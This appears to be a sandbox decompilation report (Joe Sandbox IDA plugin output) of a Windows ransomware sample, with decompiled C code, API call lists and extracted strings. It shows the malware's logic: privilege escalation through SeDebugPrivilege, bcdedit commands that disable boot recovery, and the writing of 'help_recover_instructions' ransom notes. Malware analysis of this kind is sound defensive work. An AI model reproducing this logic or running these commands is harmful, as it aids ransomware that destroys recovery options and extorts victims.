						_t276 =  *((intOrPtr*)(_t123 + 2));
						if(_t276 !=  *((intOrPtr*)(_t245 + 2))) {
							break;
						} else {
							_t123 = _t123 + 4;
							_t245 = _t245 + 4;
							if(_t276 != 0) {
								continue;
							} else {
								goto L13;
							}
						}
					}
					L15:
					if(_t123 != 0 || _a184 != _v104) {
						L50:
						_pop(_t297);
						_pop(_t306);
						_pop(_t231);
						__eflags = 0;
						return E004256FE(0, _t231, _a8916 ^ _t315, _t276, _t297, _t306);
					} else {
						_t127 = _v108;
						_t277 =  &_v80;
						_push( &_v80);
						_push(_t127);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t127 + 0x24))))() != 0 || _v88 != 0) {
							L35:
							_pop(_t298);
							_pop(_t307);
							_pop(_t232);
							return E004256FE(1, _t232, _a8908 ^ _t315, _t277, _t298, _t307);
						} else {
							_t132 = _v116;
							 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0xc))))(_t132,  &_a196);
							if(_a188 == 0) {
								E00426928(1);
							}
							_t135 = _v124;
							_v104 = 0;
							if(_t135 == 0) {
								_t135 = E00426928(0xffffffff);
							}
							_push( &_v104);
							_push(_t135);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t135 + 0x28))))() != 0) {
								E00426928(0xffffffff);
							}
							_t138 = _v132;
							_t253 =  *_t138;
							_t280 =  *((intOrPtr*)(_t253 + 4));
							_push(_t138);
							if( *((intOrPtr*)( *((intOrPtr*)(_t253 + 4))))() == 0) {
								E00426928(0xffffffff);
							}
							_t299 = LoadLibraryW(L"Shell32.dll");
							LoadStringW(_t299, 0x5509, 0x472238, 0xff); // executed
							LoadStringW(_t299, 0x5527, 0x474238, 0xff);
							_t143 = GetModuleHandleW(L"KERNEL32");
							_t234 = GetProcAddress;
							_t300 = _t143;
							 *0x48223c = GetProcAddress(_t300, "Wow64DisableWow64FsRedirection");
							_t145 = GetProcAddress(_t300, "Wow64RevertWow64FsRedirection");
							 *0x482240 = _t145; // executed
							 *_t305(0, 0x24, 0, 0, 0x478238); // executed
							 *_t305(0, 0x26, 0, 0, 0x47a238); // executed
							 *_t305(0, 0x3b, 0, 0, 0x47e238); // executed
							__imp__SHGetSpecialFolderPathW(0, 0x480238, 5, 0); // executed
							E00425ACD(0x480238, 0x1000, L"\\recover_file_");
							E00425ACD(0x480238, 0x1000,  &_a116);
							E00425ACD(0x480238, 0x1000, L".txt");
							 *_t305(0, 0x10, 0, 0, 0x470238); // executed
							 *_t305(0, 0x19, 0, 0, 0x476238); // executed
							 *_t305(0, 0x23, 0, 0, 0x47c238); // executed
							GetModuleFileNameW(0, 0x46c238, 0x1000);
							E0042623B(0x46a238, 0x1000, 0x46c238);
							E00425ACD(0x46a238, 0x1000, L":Zone.Identifier");
							_t320 = _t315 + 0x3c;
							DeleteFileW(0x46a238); // executed
							_t160 = E00420160(); // executed
							 *0x462860 = _t160; // executed
							_t161 = LookupPrivilegeValueA(0, "SeDebugPrivilege",  &_a32); // executed
							if(_t161 != 0) {
								_t305 =  &_a32;
								E004201F0(_t280,  &_a32); // executed
							}
							_t277 =  &_v260;
							_t162 = E0041F9D0( &_v260); // executed
							_t315 = _t320 + 4;
							if(_t162 == 0) {
								_t163 = E0041FAE0(_t234, __eflags);
								__eflags = _t163;
								if(_t163 != 0) {
									goto L35;
								} else {
									goto L41;
								}
							} else {
								_t218 = _v260;
								_t363 = _t218 - 0x2000;
								if(_t363 > 0) {
									__eflags = _t218 - 0x3000;
									if(__eflags == 0) {
										goto L38;
									} else {
										__eflags = _t218 - 0x4000;
										if(__eflags != 0) {
											goto L41;
										} else {
											goto L38;
										}
									}
								} else {
									if(_t363 == 0) {
										L38:
										_t219 = E0041FAE0(_t234, __eflags); // executed
										__eflags = _t219;
										if(_t219 == 0) {
											goto L41;
										} else {
											_pop(_t303);
											_pop(_t311);
											_pop(_t237);
											__eflags = _a8752 ^ _t315;
											return E004256FE(1, _t237, _a8752 ^ _t315, _t277, _t303, _t311);
										}
									} else {
										if(_t218 == 0 || _t218 == 0x1000) {
											E0041E880();
											goto L35;
										} else {
											L41:
											_t164 = E00413000(_t277, 0, 1, 0xbf78968a);
											_t321 = _t315 + 0xc;
											 *_t164(0, 0, L"12393578327533451");
											_t166 = GetLastError();
											__eflags = _t166 - 0xb7;
											if(_t166 != 0xb7) {
												E0042D0A0(0x441738, 0, 0x11c);
												0x441738->dwOSVersionInfoSize = 0x11c;
												GetVersionExW(0x441738);
												E00401480(1, _t300, __eflags);
												E0041FD80(1, _t300, _t305);
												_v260 = 0;
												CreateThread(0, 0, E0041EA20, 0, 0,  &_v260);
												E0041EF90("bcdedit.exe /set {current} bootems off");
												E0041EF90("bcdedit.exe /set {current} advancedoptions off");
												E0041EF90("bcdedit.exe /set {current} optionsedit off");
												E0041EF90("bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures");
												E0041EF90("bcdedit.exe /set {current} recoveryenabled off");
												E0041EC00(_t300, __eflags);
												_push(0x441d28);
												_push(0x441d28);
												_t255 =  *0x462894; // 0x0
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												E004206D0(0x3a98, 0x462918, _t255, 0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_t282 =  *0x4665a4; // 0x0
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												E004206D0(0x3a98, 0x4665a8, _t282, 0x441d28);
												_a60 = 0;
												E0042D0A0( &_a61, 0, 0x1df);
												_t329 = _t321 + 0xd8;
												_t256 =  &_a60;
												_t308 = 0x441d88;
												do {
													_t183 =  *_t308 & 0x000000ff;
													_t78 =  &(("0123456789ABCDEF")[_t183 >> 4]); // 0x33323130
													_t286 =  *_t78;
													_t79 =  &(("0123456789ABCDEF")[_t183 & 0x0000000f]); // 0x33323130
													 *_t256 =  *_t78;
													 *((char*)(_t256 + 1)) =  *_t79;
													_t308 =  &(_t308[1]);
													_t256 = _t256 + 2;
													__eflags = _t308 - 0x441de9;
												} while (_t308 != 0x441de9);
												 *_t256 = 0;
												_t186 = E00426466( &_v272, 0x480238, L"w+");
												_t330 = _t329 + 0xc;
												__eflags = _t186;
												if(__eflags == 0) {
													_t292 =  *0x462860; // 0x0
													_push(_t292);
													_push(0x441d28);
													_push( &_a60);
													_push(0x441d58);
													_push("%s\n%s\n%S\n%d\n");
													_push(_v272);
													E004264B8(1, _t300, _t308, __eflags);
													_t286 = _v272;
													_push(_v272);
													_t186 = E00426631(1, _t300, _t308, __eflags);
													_t330 = _t330 + 0x1c;
												}
												E00423440(_t186);
												_t301 = 0;
												__eflags =  *0x441d1c - 1; // 0x0
												if(__eflags == 0) {
													 *0x462864 = 0;
													_t213 = E00420700(E0041B480);
													_t330 = _t330 + 4;
													_t301 = _t213;
												}
												 *0x46a234 = 1;
												E00420700(E0041FF20);
												_t309 = E00420700(E00413840);
												SetThreadPriority(_t309, 0xfffffff1);
												_t191 = E00413000(_t286, 0, 1, 0xc54374f3);
												 *_t191(_t309, 0xffffffff);
												__eflags = 0;
												_a532 = 0;
												E0042D0A0( &_a534, 0, 0x1ffe);
												E00414300(0x1000,  &_a532, L"%s\\help_recover_instructions.TXT", 0x470238);
												E0041F910( &_a532,  &_a534);
												E00420730( &_a532);
												_push(L".HTM");
												E00414300(0x1000,  &_a532, L"%s\\help_recover_instructions%s", 0x470238);
												E0041F970( &_a532,  &_a532);
												E00420730( &_a532);
												E00414300(0x1000,  &_a532, L"%s\\help_recover_instructions.BMP", 0x470238);
												E00420350( &_a532);
												_t276 =  &_a532;
												E00420730( &_a532);
												E00420700(E0041EA20);
												E00420840( &_a532, _t301, 0x2bf20);
												 *0x462864 = 1;
												E00420840( &_a532, E00420700(E0041B480), 0xea60);
												_t315 = _t330 + 0x70;
												E0041FC50(1, _t276, _t301, _t309, __eflags);
												goto L50;
											} else {
												_pop(_t302);
												_pop(_t310);
												_pop(_t236);
												__eflags = _a8740 ^ _t321;
												return E004256FE(1, _t236, _a8740 ^ _t321, _t277, _t302, _t310);
											}
										}
									}
								}
							}
						}
					}
				}
				asm("sbb eax, eax");
				asm("sbb eax, 0xffffffff");
				goto L15;
			}

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 0041F09B
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0041F0B4
FreeSid.ADVAPI32(?), ref: 0041F0C7
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 0041F0E6

Part of subcall function 004233D0: GetTickCount.KERNEL32(?,?,?,?,0041386B,00442000,00000003), ref: 004233E1
Part of subcall function 004233D0: Sleep.KERNELBASE(0000000F), ref: 00423417

CoCreateInstance.OLE32(0043B924,00000000,00000001,004312C8,?), ref: 0041F168
ExitProcess.KERNEL32 ref: 0041F188
CoCreateInstance.OLE32(0043B934,00000000,00000001,004312B8,?), ref: 0041F1A0
ExitProcess.KERNEL32 ref: 0041F1DE
LoadLibraryW.KERNEL32(Shell32.dll), ref: 0041F2F2
LoadStringW.USER32(00000000,00005509,00472238,000000FF), ref: 0041F310
LoadStringW.USER32(00000000,00005527,00474238,000000FF), ref: 0041F322
GetModuleHandleW.KERNEL32(KERNEL32), ref: 0041F329
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0041F33D
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0041F34A
SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,00478238), ref: 0041F35E
SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0047A238), ref: 0041F36D
SHGetFolderPathW.SHELL32(00000000,0000003B,00000000,00000000,0047E238), ref: 0041F37C
SHGetSpecialFolderPathW.SHELL32(00000000,00480238,00000005,00000000), ref: 0041F389
SHGetFolderPathW.SHELL32(00000000,00000010,00000000,00000000,00470238), ref: 0041F3E4
SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,00476238), ref: 0041F3F3
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0047C238), ref: 0041F402
GetModuleFileNameW.KERNEL32(00000000,0046C238,00001000), ref: 0041F410
DeleteFileW.KERNELBASE(0046A238), ref: 0041F449

Part of subcall function 00420160: CreateFileW.KERNEL32(0046C238,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00420184
Part of subcall function 00420160: SetFilePointer.KERNELBASE(00000000,0000003C,00000000,00000000,00000000,7600CD44), ref: 004201A0
Part of subcall function 00420160: ReadFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 004201B5
Part of subcall function 00420160: SetFilePointer.KERNELBASE(00000000,-00000058,00000000,00000000), ref: 004201C4
Part of subcall function 00420160: ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004201D3
Part of subcall function 00420160: CloseHandle.KERNEL32(00000000), ref: 004201D6

LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0041F468

Part of subcall function 0041F9D0: SetLastError.KERNEL32(00000057,76F85660,?,0041F488,?), ref: 0041F9EF
Part of subcall function 0041F9D0: GetCurrentProcess.KERNEL32(00000008,0041F488,00000000,76F85660,?,0041F488,?), ref: 0041FA03
Part of subcall function 0041F9D0: OpenProcessToken.ADVAPI32(00000000,?,0041F488,?), ref: 0041FA0A
Part of subcall function 0041F9D0: GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA14
Part of subcall function 0041F9D0: GetTokenInformation.KERNELBASE(0041F488,00000019,00000000,00000000,?,7600CD44,?,0041F488,?), ref: 0041FA32
Part of subcall function 0041F9D0: GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA3E
Part of subcall function 0041F9D0: GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA45
Part of subcall function 0041F9D0: LocalAlloc.KERNEL32(00000040,?,?,0041F488,?), ref: 0041FA52
Part of subcall function 0041F9D0: GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA5E
Part of subcall function 0041F9D0: GetTokenInformation.KERNELBASE(0041F488,00000019,00000000,?,?,?,0041F488,?), ref: 0041FA74
Part of subcall function 0041F9D0: GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA7A
Part of subcall function 0041F9D0: GetSidSubAuthority.ADVAPI32(?,00000000,?,0041F488,?), ref: 0041FA86
Part of subcall function 0041F9D0: CloseHandle.KERNEL32(0041F488), ref: 0041FA9E
Part of subcall function 0041F9D0: LocalFree.KERNEL32 ref: 0041FAAC
Part of subcall function 0041F9D0: SetLastError.KERNEL32(?,?,0041F488,?), ref: 0041FABF

Part of subcall function 0041E880: GetEnvironmentVariableW.KERNEL32(windir,?,00000208), ref: 0041E8E2
Part of subcall function 0041E880: ShellExecuteExW.SHELL32(?), ref: 0041E9C6
Part of subcall function 0041E880: GetLastError.KERNEL32 ref: 0041E9E0
Part of subcall function 0041E880: Sleep.KERNEL32(000003E8), ref: 0041E9EE
Part of subcall function 0041E880: ShellExecuteExW.SHELL32(0000003C), ref: 0041E9F7
Part of subcall function 0041E880: CloseHandle.KERNEL32(?), ref: 0041EA06

Part of subcall function 004201F0: GetCurrentProcess.KERNEL32(00020028,?,?,?,?,?,?,0041F47E), ref: 0042020B
Part of subcall function 004201F0: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0041F47E), ref: 00420212
Part of subcall function 004201F0: AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000000,00000000,00000000), ref: 00420253
Part of subcall function 004201F0: CloseHandle.KERNEL32(?), ref: 0042025D

Part of subcall function 0041FAE0: PathFindFileNameW.SHLWAPI(0046C238), ref: 0041FB29
Part of subcall function 0041FAE0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041FB64
Part of subcall function 0041FAE0: GetLastError.KERNEL32(?,?,?,?,?,00000000,76F85660,?,0041F500), ref: 0041FB6C
Part of subcall function 0041FAE0: CloseHandle.KERNEL32(00000000), ref: 0041FB75
Part of subcall function 0041FAE0: CopyFileW.KERNEL32(0046C238,?,00000000), ref: 0041FBC0
Part of subcall function 0041FAE0: CreateProcessW.KERNEL32 ref: 0041FC14

GetLastError.KERNEL32 ref: 0041F524
GetVersionExW.KERNEL32(00441738), ref: 0041F56D

Part of subcall function 0041FD80: RegCreateKeyExA.ADVAPI32 ref: 0041FDE1
Part of subcall function 0041FD80: RegSetValueExW.ADVAPI32(?,EnableLinkedConnections,00000000,00000004,00000001,00000004), ref: 0041FE00
Part of subcall function 0041FD80: RegFlushKey.ADVAPI32(?), ref: 0041FE0D
Part of subcall function 0041FD80: RegCloseKey.ADVAPI32(?), ref: 0041FE1A

CreateThread.KERNEL32 ref: 0041F597

Part of subcall function 0041EF90: WaitForSingleObject.KERNEL32(?,00007530), ref: 0041F005
Part of subcall function 0041EF90: CloseHandle.KERNEL32(?), ref: 0041F015
Part of subcall function 0041EF90: CloseHandle.KERNEL32(?), ref: 0041F01B
Part of subcall function 0041EF90: Sleep.KERNEL32(000003E8), ref: 0041F022

SetThreadPriority.KERNEL32(00000000,000000F1,?,?,?,?,?,?,00000000,000001DF,004665A8,00000000,00441D28,00441D28,00441D28,00441D28), ref: 0041F7C5

Part of subcall function 0041F910: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0041F931
Part of subcall function 0041F910: WriteFile.KERNEL32(00000000,00462918,00462919,00000000,00000000), ref: 0041F95C
Part of subcall function 0041F910: CloseHandle.KERNEL32(00000000), ref: 0041F963

Part of subcall function 0041F970: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0041F991
Part of subcall function 0041F970: WriteFile.KERNEL32(00000000,004665A8,004665A9,00000000,00000000), ref: 0041F9BC
Part of subcall function 0041F970: CloseHandle.KERNEL32(00000000), ref: 0041F9C3

Part of subcall function 00420350: GetDC.USER32(00000000), ref: 004203EB
Part of subcall function 00420350: GetDIBits.GDI32(00000000,?,00000000,?,00000000,?,00000000), ref: 0042041C
Part of subcall function 00420350: ReleaseDC.USER32(00000000,00000000), ref: 00420425
Part of subcall function 00420350: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0042045E
Part of subcall function 00420350: WriteFile.KERNEL32(00000000,?,0000000E,00000000,00000000), ref: 00420478
Part of subcall function 00420350: WriteFile.KERNEL32(00000000,00000028,00000028,00000000,00000000), ref: 00420492
Part of subcall function 00420350: WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 004204A8
Part of subcall function 00420350: FlushFileBuffers.KERNEL32(00000000), ref: 004204AF
Part of subcall function 00420350: CloseHandle.KERNEL32(00000000), ref: 004204B6
Part of subcall function 00420350: DeleteObject.GDI32(?), ref: 004204C9

Part of subcall function 0041FC50: GetShortPathNameW.KERNEL32(?,?,00001000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041FCA1

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

%s\help_recover_instructions%s, xrefs: 0041F84C
:Zone.Identifier, xrefs: 0041F42D
bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures, xrefs: 0041F5C4
KERNEL32, xrefs: 0041F324
%s\help_recover_instructions.BMP, xrefs: 0041F884
%s%s%S%d, xrefs: 0041F764
bcdedit.exe /set {current} optionsedit off, xrefs: 0041F5B7
%s\help_recover_instructions.TXT, xrefs: 0041F80C
bcdedit.exe /set {current} advancedoptions off, xrefs: 0041F5AA
Wow64DisableWow64FsRedirection, xrefs: 0041F337
.txt, xrefs: 0041F3C0
SeDebugPrivilege, xrefs: 0041F45C
bcdedit.exe /set {current} recoveryenabled off, xrefs: 0041F5D1
Wow64RevertWow64FsRedirection, xrefs: 0041F33F
.HTM, xrefs: 0041F83B
C:\Users\admin\AppData\Roaming, xrefs: 0041F0D7
\recover_file_, xrefs: 0041F38F
bcdedit.exe /set {current} bootems off, xrefs: 0041F59D
Shell32.dll, xrefs: 0041F2ED
12393578327533451, xrefs: 0041F519

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0042AB4E, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 109

C-Code - Quality: 51%

			E0042AB4E(void* __ebx, void* __edx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				_Unknown_base(*)()* _t17;
				void* _t18;
				intOrPtr* _t20;
				intOrPtr _t21;
				intOrPtr* _t23;
				long _t26;
				void* _t30;
				void* _t35;
				struct HINSTANCE__* _t36;
				intOrPtr* _t37;
				void* _t40;
				intOrPtr* _t42;
				void* _t43;

				_t35 = __edx;
				_t30 = __ebx;
				_t36 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t36 != 0) {
					 *0x440e88 = GetProcAddress(_t36, "FlsAlloc");
					 *0x440e8c = GetProcAddress(_t36, "FlsGetValue");
					 *0x440e90 = GetProcAddress(_t36, "FlsSetValue");
					_t7 = GetProcAddress(_t36, "FlsFree");
					__eflags =  *0x440e88;
					_t40 = TlsSetValue;
					 *0x440e94 = _t7;
					if( *0x440e88 == 0) {
						L6:
						 *0x440e8c = TlsGetValue;
						 *0x440e88 = E0042A85E;
						 *0x440e90 = _t40;
						 *0x440e94 = TlsFree;
					} else {
						__eflags =  *0x440e8c;
						if( *0x440e8c == 0) {
							goto L6;
						} else {
							__eflags =  *0x440e90;
							if( *0x440e90 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0x43fbd0 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x440e8c);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E004266FA();
							_t42 = __imp__EncodePointer; // executed
							_t14 =  *_t42( *0x440e88); // executed
							 *0x440e88 = _t14; // executed
							_t15 =  *_t42( *0x440e8c); // executed
							 *0x440e8c = _t15; // executed
							_t16 =  *_t42( *0x440e90); // executed
							 *0x440e90 = _t16; // executed
							_t17 =  *_t42( *0x440e94); // executed
							 *0x440e94 = _t17;
							_t18 = E0042B881();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E0042A89B();
								goto L15;
							} else {
								_t37 = __imp__DecodePointer;
								_t20 =  *_t37( *0x440e88, E0042AA1F); // executed
								_t21 =  *_t20();
								 *0x43fbcc = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t43 = E0042D15F(1, 0x214);
									__eflags = _t43;
									if(_t43 == 0) {
										goto L14;
									} else {
										_t23 =  *_t37( *0x440e90,  *0x43fbcc, _t43); // executed
										__eflags =  *_t23();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t43);
											E0042A8D8(_t30, _t35, _t37, _t43, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
											 *_t43 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E0042A89B();
					return 0;
				}
			}

0x0042ab4e
0x0042ab4e
0x0042ab5c
0x0042ab60
0x0042ab80
0x0042ab8d
0x0042ab9a
0x0042ab9f
0x0042aba1
0x0042aba8
0x0042abae
0x0042abb3
0x0042abcb
0x0042abd0
0x0042abda
0x0042abe4
0x0042abea
0x0042abb5
0x0042abb5
0x0042abbc
0x00000000
0x0042abbe
0x0042abbe
0x0042abc5
0x00000000
0x0042abc7
0x0042abc7
0x0042abc9
0x00000000
0x00000000
0x0042abc9
0x0042abc5
0x0042abbc
0x0042abef
0x0042abf5
0x0042abfa
0x0042abfd
0x0042acc4
0x0042acc4
0x0042acc4
0x0042ac03
0x0042ac0a
0x0042ac0c
0x0042ac0e
0x00000000
0x0042ac14
0x0042ac14
0x0042ac1f
0x0042ac25
0x0042ac2d
0x0042ac32
0x0042ac3a
0x0042ac3f
0x0042ac47
0x0042ac4c
0x0042ac4e
0x0042ac53
0x0042ac58
0x0042ac5a
0x0042acbf
0x0042acbf
0x00000000
0x0042ac5c
0x0042ac5c
0x0042ac6d
0x0042ac6f
0x0042ac71
0x0042ac76
0x0042ac79
0x00000000
0x0042ac7b
0x0042ac87
0x0042ac8b
0x0042ac8d
0x00000000
0x0042ac8f
0x0042ac9c
0x0042aca0
0x0042aca2
0x00000000
0x0042aca4
0x0042aca4
0x0042aca6
0x0042aca7
0x0042acae
0x0042acb4
0x0042acb8
0x0042acbc
0x0042acbc
0x0042aca2
0x0042ac8d
0x0042ac79
0x0042ac5a
0x0042ac0e
0x0042acc8
0x0042ab62
0x0042ab62
0x0042ab6a
0x0042ab6a

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00426BF2), ref: 0042AB56
GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,00426BF2), ref: 0042AB78
GetProcAddress.KERNEL32(00000000,FlsGetValue,?,00426BF2), ref: 0042AB85
GetProcAddress.KERNEL32(00000000,FlsSetValue,?,00426BF2), ref: 0042AB92
GetProcAddress.KERNEL32(00000000,FlsFree,?,00426BF2), ref: 0042AB9F
TlsAlloc.KERNEL32(?,00426BF2), ref: 0042ABEF
TlsSetValue.KERNEL32(00000000,?,00426BF2), ref: 0042AC0A
EncodePointer.KERNEL32(?,00426BF2), ref: 0042AC25
EncodePointer.KERNEL32(?,00426BF2), ref: 0042AC32
EncodePointer.KERNEL32(?,00426BF2), ref: 0042AC3F
EncodePointer.KERNEL32(?,00426BF2), ref: 0042AC4C

Part of subcall function 0042B881: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 0042B8A9

DecodePointer.KERNEL32(0042AA1F,?,00426BF2), ref: 0042AC6D

Part of subcall function 0042D15F: Sleep.KERNEL32(00000000), ref: 0042D187

DecodePointer.KERNEL32(00000000,?,00426BF2), ref: 0042AC9C

Part of subcall function 0042A8D8: GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043C1F0,00000008,0042A9E0,00000000,00000000,?,?,0042712A,00425909), ref: 0042A8E9
Part of subcall function 0042A8D8: InterlockedIncrement.KERNEL32(?), ref: 0042A92A

GetCurrentThreadId.KERNEL32(?,00426BF2), ref: 0042ACAE

Part of subcall function 0042A89B: DecodePointer.KERNEL32(00000004,0042ACC4,?,00426BF2), ref: 0042A8AC
Part of subcall function 0042A89B: TlsFree.KERNEL32(0000001B,0042ACC4,?,00426BF2), ref: 0042A8C6
Part of subcall function 0042A89B: DeleteCriticalSection.KERNEL32(00000000,00000000,77CFA295,?,0042ACC4,?,00426BF2), ref: 0042B8E8
Part of subcall function 0042A89B: DeleteCriticalSection.KERNEL32(0000001B,77CFA295,?,0042ACC4,?,00426BF2), ref: 0042B912

Strings

FlsAlloc, xrefs: 0042AB72
FlsFree, xrefs: 0042AB94
FlsGetValue, xrefs: 0042AB7A
KERNEL32.DLL, xrefs: 0042AB51
FlsSetValue, xrefs: 0042AB87

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0041F9D0, Relevance: 22.6, APIs: 15, Instructions: 110

C-Code - Quality: 100%

			E0041F9D0(long* _a4) {
				long _v8;
				void* _v12;
				long _v16;
				int _t25;
				int _t29;
				void* _t32;
				void* _t58;

				_t58 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				if(_a4 != 0) {
					if(OpenProcessToken(GetCurrentProcess(), 8,  &_v12) != 0) {
						_t25 = GetTokenInformation(_v12, 0x19, 0, 0,  &_v16); // executed
						if(_t25 != 0 || GetLastError() == 0x7a) {
							_t58 = LocalAlloc(0x40, _v16);
							if(_t58 != 0) {
								_t29 = GetTokenInformation(_v12, 0x19, _t58, _v16,  &_v16); // executed
								if(_t29 != 0) {
									 *_a4 =  *(GetSidSubAuthority( *_t58, 0));
								} else {
									_v8 = GetLastError();
								}
							} else {
								_v8 = GetLastError();
							}
						} else {
							_v8 = GetLastError();
						}
					} else {
						_v8 = GetLastError();
					}
					_t32 = _v12;
					if(_t32 != 0) {
						CloseHandle(_t32);
						_v12 = 0;
					}
					if(_t58 != 0) {
						LocalFree(_t58);
						_v16 = 0;
					}
					if(_v8 == 0) {
						return 1;
					} else {
						SetLastError(_v8);
						return 0;
					}
				} else {
					SetLastError(0x57);
					return 0;
				}
			}

0x0041f9d9
0x0041f9db
0x0041f9de
0x0041f9e1
0x0041f9e7
0x0041fa12
0x0041fa32
0x0041fa3c
0x0041fa58
0x0041fa5c
0x0041fa74
0x0041fa78
0x0041fa91
0x0041fa7a
0x0041fa7c
0x0041fa7c
0x0041fa5e
0x0041fa60
0x0041fa60
0x0041fa45
0x0041fa47
0x0041fa47
0x0041fa14
0x0041fa1a
0x0041fa1a
0x0041fa94
0x0041fa9b
0x0041fa9e
0x0041faa4
0x0041faa4
0x0041faa9
0x0041faac
0x0041fab2
0x0041fab2
0x0041fab9
0x0041fad5
0x0041fabb
0x0041fabf
0x0041facb
0x0041facb
0x0041f9e9
0x0041f9ef
0x0041f9fb
0x0041f9fb

APIs

SetLastError.KERNEL32(00000057,76F85660,?,0041F488,?), ref: 0041F9EF
GetCurrentProcess.KERNEL32(00000008,0041F488,00000000,76F85660,?,0041F488,?), ref: 0041FA03
OpenProcessToken.ADVAPI32(00000000,?,0041F488,?), ref: 0041FA0A
GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA14
GetTokenInformation.KERNELBASE(0041F488,00000019,00000000,00000000,?,7600CD44,?,0041F488,?), ref: 0041FA32
GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA3E
GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA45
LocalAlloc.KERNEL32(00000040,?,?,0041F488,?), ref: 0041FA52
GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA5E
GetTokenInformation.KERNELBASE(0041F488,00000019,00000000,?,?,?,0041F488,?), ref: 0041FA74
GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA7A
GetSidSubAuthority.ADVAPI32(?,00000000,?,0041F488,?), ref: 0041FA86
CloseHandle.KERNEL32(0041F488), ref: 0041FA9E
LocalFree.KERNEL32 ref: 0041FAAC
SetLastError.KERNEL32(?,?,0041F488,?), ref: 0041FABF

Memory Dump Source

